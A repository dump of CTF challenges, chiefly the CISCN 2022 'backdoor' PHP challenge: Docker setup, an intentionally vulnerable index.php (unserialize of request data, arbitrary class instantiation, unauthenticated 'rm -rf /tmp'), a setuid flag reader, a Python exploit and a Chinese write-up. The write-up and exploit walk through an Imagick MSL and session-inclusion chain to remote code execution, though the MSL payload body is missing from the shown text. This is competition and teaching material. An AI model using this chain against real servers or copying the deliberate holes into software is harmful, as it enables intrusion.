├── .gitmodules ├── CISCN └── 2022 │ └── backdoor │ ├── Dockerfile │ ├── docker-compose.yml │ ├── exp │ └── exp.py │ ├── flag │ ├── html │ └── index.php │ ├── readflag │ ├── go.mod │ ├── main.go │ └── readflag │ └── writup │ ├── img │ ├── flag.png │ ├── phpinfo.png │ └── src.png │ └── writup.md ├── README.md └── SCTF └── 2021 └── README.md /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "GeekGame"] 2 | path = GeekGame 3 | url = https://github.com/AFKL-CUIT/GeekGame-AFKL 4 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.4-apache 2 | 3 | COPY html /var/www/html 4 | 5 | COPY flag /flag 6 | COPY readflag/readflag /readflag 7 | 8 | RUN sed -i 's#http://deb.debian.org#http://mirrors.aliyun.com#g' /etc/apt/sources.list &&\ 9 | apt-get update && apt-get install -y libmagickwand-dev --no-install-recommends 10 | 11 | RUN pecl install imagick && docker-php-ext-enable imagick &&\ 12 | chmod -R 555 /var/www/html &&\ 13 | chmod 400 /flag &&\ 14 | chmod 111 /readflag && chmod u+s /readflag 15 | 16 | EXPOSE 80 17 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | imagsess: 4 | build: 5 | context: ./ 6 | dockerfile: Dockerfile 7 | restart: always 8 | ports: 9 | - "18080:80" 10 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/exp/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #coding:utf-8 3 | 4 | import re 5 | import sys 6 | import time 7 | import requests 8 | 9 | timeout = 30 10 | 11 | host = sys.argv[1] 12 | port = sys.argv[2] 13 | 14 | url = 
f"http://{host}:{port}" 15 | write_session_payload = "O%3A8%3A%22backdoor%22%3A3%3A%7Bs%3A14%3A%22%00backdoor%00argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A15%3A%22%00backdoor%00class%22%3Bs%3A7%3A%22imagick%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A0%3B%7D" 16 | session_sleep_chain_payload = "O%3A8%3A%22backdoor%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22session_start%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A1%3B%7D" 17 | 18 | def rm_tmp_file(): 19 | headers = {"Accept": "*/*"} 20 | requests.get( 21 | f"{url}/?cmd=rm", 22 | headers=headers 23 | ) 24 | 25 | def upload_session(): 26 | headers = { 27 | "Accept": "*/*", 28 | "Content-Type": "multipart/form-data; boundary=------------------------c32aaddf3d8fd979" 29 | } 30 | data = "--------------------------c32aaddf3d8fd979\r\nContent-Disposition: form-data; name=\"swarm\"; filename=\"swarm.msl\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n\r\n \r\n \r\n\r\n--------------------------c32aaddf3d8fd979--" 31 | try: 32 | requests.post( 33 | f"{url}/?data=O%3A8%3A%22backdoor%22%3A3%3A%7Bs%3A14%3A%22%00backdoor%00argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A15%3A%22%00backdoor%00class%22%3Bs%3A7%3A%22imagick%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A0%3B%7D&cmd=unserialze", 34 | headers=headers, data=data 35 | ) 36 | except requests.exceptions.ConnectionError: 37 | pass 38 | 39 | def get_flag(): 40 | cookies = {"PHPSESSID": "afkl"} 41 | headers = {"Accept": "*/*"} 42 | response = requests.get( 43 | f"{url}/?data=O%3A8%3A%22backdoor%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22session_start%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A1%3B%7D&cmd=unserialze&1=system('/readflag');", 44 | headers=headers, cookies=cookies 45 | ) 46 | return re.findall(r"(flag\{.*\})", response.text) 47 | 48 | # 主逻辑 49 | if __name__ == '__main__': 50 | rm_tmp_file() 51 | upload_session() 52 | 53 | time.sleep(1) 54 | 55 | print(get_flag()[0]) 56 | 
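--------------------------------------------------------------------------------
/CISCN/2022/backdoor/flag:
--------------------------------------------------------------------------------
flag{imaG1ck_And_sEssi0n_is_c0ol}
--------------------------------------------------------------------------------
/CISCN/2022/backdoor/html/index.php:
--------------------------------------------------------------------------------
// NOTE(review): the listing jumps from line 1 to line 11 here. The `<?php`
// opener, the `class backdoor` declaration with its properties and the start of
// __sleep() appear to have been lost when this page was rendered; the text
// resumes mid-condition inside __sleep(), where `$this->path` is checked
// before being included.
path)) {
            return include $this->path;
        } else {
            throw new Exception("__sleep failed...");
        }
    }

    public function __wakeup() {
        if (
            $this->do_exec_func &&
            in_array($this->class, get_defined_functions()["internal"])
        ) {
            // Calls any internal function by name, with no arguments
            // (the write-up uses this for phpinfo() and session_start()).
            call_user_func($this->class);
        } else {
            $argv = $this->argv;
            $class = $this->class;

            // Arbitrary class instantiation with one attacker-chosen argument;
            // `new imagick("vid:msl:/tmp/php*")` is what the exploit does here.
            new $class($argv);
        }
    }
}


$cmd = $_REQUEST['cmd'];
$data = $_REQUEST['data'];

switch ($cmd) {
    // Note the spelling: clients must send cmd=unserialze, not "unserialize".
    case 'unserialze':
        // unserialize() on request-controlled data: __wakeup() runs for every
        // backdoor object in $data, which is the entry point of the whole chain.
        unserialize($data);
        break;

    case 'rm':
        // Unauthenticated wipe of /tmp: removes every session file and upload
        // temp file. The exploit uses it so that /tmp/php* matches only its
        // own upload.
        system("rm -rf /tmp");
        break;

    default:
        highlight_file(__FILE__);
        break;
}
--------------------------------------------------------------------------------
/CISCN/2022/backdoor/readflag/go.mod:
--------------------------------------------------------------------------------
module readflag

go 1.17
--------------------------------------------------------------------------------
/CISCN/2022/backdoor/readflag/main.go:
--------------------------------------------------------------------------------
package main

import (
	"fmt"
	"os"
)

// readflag prints /flag. It is installed setuid root (Dockerfile: chmod 111
// followed by chmod u+s) because /flag itself is mode 0400, so this binary is
// the only way the web process can read it. The Dockerfile copies the prebuilt
// readflag/readflag; rebuild that binary after changing this file.
func main() {
	// os.ReadFile replaces the deprecated ioutil.ReadFile (go.mod is 1.17).
	flagData, err := os.ReadFile("/flag")
	if err != nil {
		// Do not swallow the error: an empty line is indistinguishable from an
		// exploit that never ran. Report it and exit non-zero so a lost setuid
		// bit or a missing /flag is diagnosable.
		fmt.Fprintln(os.Stderr, "readflag:", err)
		os.Exit(1)
	}
	fmt.Println(string(flagData))
}
--------------------------------------------------------------------------------
/CISCN/2022/backdoor/readflag/readflag:
--------------------------------------------------------------------------------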
https://raw.githubusercontent.com/AFKL1919/CTF-Challenges/a2199e002ce59711dcdb0e916d8c3c0c29821dbf/CISCN/2022/backdoor/readflag/readflag -------------------------------------------------------------------------------- /CISCN/2022/backdoor/writup/img/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AFKL1919/CTF-Challenges/a2199e002ce59711dcdb0e916d8c3c0c29821dbf/CISCN/2022/backdoor/writup/img/flag.png -------------------------------------------------------------------------------- /CISCN/2022/backdoor/writup/img/phpinfo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AFKL1919/CTF-Challenges/a2199e002ce59711dcdb0e916d8c3c0c29821dbf/CISCN/2022/backdoor/writup/img/phpinfo.png -------------------------------------------------------------------------------- /CISCN/2022/backdoor/writup/img/src.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AFKL1919/CTF-Challenges/a2199e002ce59711dcdb0e916d8c3c0c29821dbf/CISCN/2022/backdoor/writup/img/src.png -------------------------------------------------------------------------------- /CISCN/2022/backdoor/writup/writup.md: -------------------------------------------------------------------------------- 1 | ## 题目writeup: 2 | 3 | 题目灵感来自于`swarm`团队在7月14日发布的[文章](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/),该文章展示了针对如下结构的php代码的一种全新攻击方法。 4 | ```php 5 | new $_GET[1]($_GET[2]); 6 | ``` 7 | 8 | 网站首页展示的就是源码。 9 | ![1](img/src.png) 10 | 11 | 存在反序列化漏洞,以及一个`backdoor`类。类中有两个特殊结构: 12 | 1. 在`__wakeup`可以执行一次任意无参函数的结构。 13 | 2. 
在`__sleep`可以将任意文件包含。

`include`临时文件或者`session`文件即可`RCE`,关键在于如何触发`__sleep`:它只在对象被`serialize`时调用。通过php内核源码可知,当前环境下唯一会对对象做序列化的地方就是`session`——`session_start()`读取并反序列化`session`文件,请求结束把`$_SESSION`写回文件时再次序列化其中的对象,`__sleep`正是在这一步触发。所以要想办法控制`session`数据。

接下来尝试触发`phpinfo`,收集信息。可以发现网站存在`imagick`扩展。
![1](img/phpinfo.png)

那么接下来就是利用imagick扩展的特性进行攻击。

根据这篇[文章](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)发现,`imagick`类在初始化时可以执行`Magick Scripting Language`。那么考虑用其特性,在临时文件中写入`Magick Scripting Language`,然后在`imagick`类初始化的时候执行临时文件写入`session`文件。再触发`__sleep`包含`session`文件以`RCE`。

写入文件时须注意以下几点:
1. 因为`imagick`对文件格式解析较严,需要写入的文件必须是其支持的图片格式,如jpg、gif、ico等。如果直接插入`session`数据,会导致解析图片错误,导致文件无法写入。
2. `php`对`session`的格式解析也较为严格。数据尾不可以存在脏数据,否则`session`解析错误会无法触发`__sleep`。

所以我们需要找到一个容许在末尾添加脏数据,且脏数据不会被`imagick`抹去的图片格式。`imagick`共支持几十种图片格式。

找到一个这样的图片格式并不难。最后发现可以使用`ppm`格式,其不像其他图片格式存在`crc`校验或者在文件末尾存在`magic`头。结构十分简单,可以进行利用。

首先利用网站提供的功能,删除`/tmp`下的文件。这样下一步`vid:msl:/tmp/php*`这个通配路径只会匹配到本次上传产生的临时文件(注意这同时会清掉`/tmp`下所有其他的`session`文件)。
```http
GET /?cmd=rm HTTP/1.1
Host: 127.0.0.1:18080
Accept: */*


```

然后如下发包。这样`imagick`就会开始执行`Magick Scripting Language`,写入文件`/tmp/sess_afkl`。(下面请求体中的MSL XML在本页渲染时已被去除,只剩下空行;`Content-Length: 703`对应的应该是原始的完整请求体。)
```http
POST /?data=O%3A8%3A%22backdoor%22%3A3%3A%7Bs%3A14%3A%22%00backdoor%00argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A15%3A%22%00backdoor%00class%22%3Bs%3A7%3A%22imagick%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A0%3B%7D&cmd=unserialze HTTP/1.1
Host: 127.0.0.1:18080
Accept: */*
Content-Length: 703
Content-Type: multipart/form-data; boundary=------------------------c32aaddf3d8fd979

--------------------------c32aaddf3d8fd979
Content-Disposition: form-data; name="swarm"; filename="swarm.msl"
Content-Type: application/octet-stream






--------------------------c32aaddf3d8fd979--
```

随后使用执行一次任意无参函数的功能,触发`session_start`函数,并设置`cookie`为`PHPSESSID=afkl`,即可文件包含`session`,成功`RCE`。`flag`通过执行根目录下的`/readflag`读取即可:`/flag`本身是`0400`权限,web进程无法直接读取,`/readflag`是`setuid`程序(见Dockerfile)。
```http
GET 
/?data=O%3A8%3A%22backdoor%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22session_start%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A1%3B%7D&cmd=unserialze&1=system('/readflag'); HTTP/1.1 64 | Host: 127.0.0.1:18080 65 | Accept: */* 66 | Cookie: PHPSESSID=afkl 67 | 68 | 69 | ``` 70 | 71 | ![2](img/flag.png) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | A collection of all the CTF challenges I have made. 2 | 3 | ``` 4 | . 5 | ├── CISCN # 全国大学生信息安全竞赛 6 | │   └── 2022 7 | │   └── backdoor 8 | ├── GeekGame # 极客大挑战 9 | │   ├── 2020 10 | │   │   ├── X迪的pyp语言 11 | │   │   ├── pop chain epic 12 | │   │   ├── wp 13 | │   │   └── 知X堂的php教程 14 | │   └── 2021 15 | │   ├── babyPOP 16 | │   ├── babyPy 17 | │   ├── easyGO 18 | │   ├── easyPOP 19 | │   ├── easyPy 20 | │   ├── where_is_my_FUMO 21 | │   └── wp 22 | └── SCTF 23 | └── 2021 24 | ``` -------------------------------------------------------------------------------- /SCTF/2021/README.md: -------------------------------------------------------------------------------- 1 | # Where is the Challenges? 2 | 3 | Please see the [web partition in the SCTF2021](https://github.com/SycloverTeam/SCTF2021/tree/master/web) project. 4 | Url: https://github.com/SycloverTeam/SCTF2021/tree/master/web 5 | 6 | # Which Challenges did you produce? 7 | 8 | - FUMO_on_the_Christmas_tree 9 | - GOFTP 10 | - Upload_it_1 11 | - Upload_it_2 12 | - ezosu --------------------------------------------------------------------------------